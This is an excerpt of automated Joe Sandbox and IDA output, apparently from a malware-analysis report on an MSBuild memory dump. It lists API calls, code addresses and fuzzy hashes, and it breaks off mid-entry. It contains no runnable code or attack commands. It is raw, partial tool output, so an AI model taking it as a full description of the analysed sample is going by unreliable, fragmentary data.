                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3056473165-0
                                                                                                                                                                                    • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                    • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                                                    • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                    • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: BINARY
                                                                                                                                                                                    • API String ID: 2221118986-907554435
                                                                                                                                                                                    • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                                                                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                    • API String ID: 2081463915-3817206916
                                                                                                                                                                                    • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                    • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2445788494-0
                                                                                                                                                                                    • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                    • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3150196962-0
                                                                                                                                                                                    • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                    • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: malloc
                                                                                                                                                                                    • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                    • API String ID: 2803490479-1168259600
                                                                                                                                                                                    • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                    • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                                                    • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmpmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1065087418-0
                                                                                                                                                                                    • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                    • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1381354015-0
                                                                                                                                                                                    • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                    • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                      • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2154303073-0
                                                                                                                                                                                    • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                    • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3150196962-0
                                                                                                                                                                                    • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                    • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$PointerRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3154509469-0
                                                                                                                                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4232544981-0
                                                                                                                                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$FileModuleName
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3859505661-0
                                                                                                                                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
